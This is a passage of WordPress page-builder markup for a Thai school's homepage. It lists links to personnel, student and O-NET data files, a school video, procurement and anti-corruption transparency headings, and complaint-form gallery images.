kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersi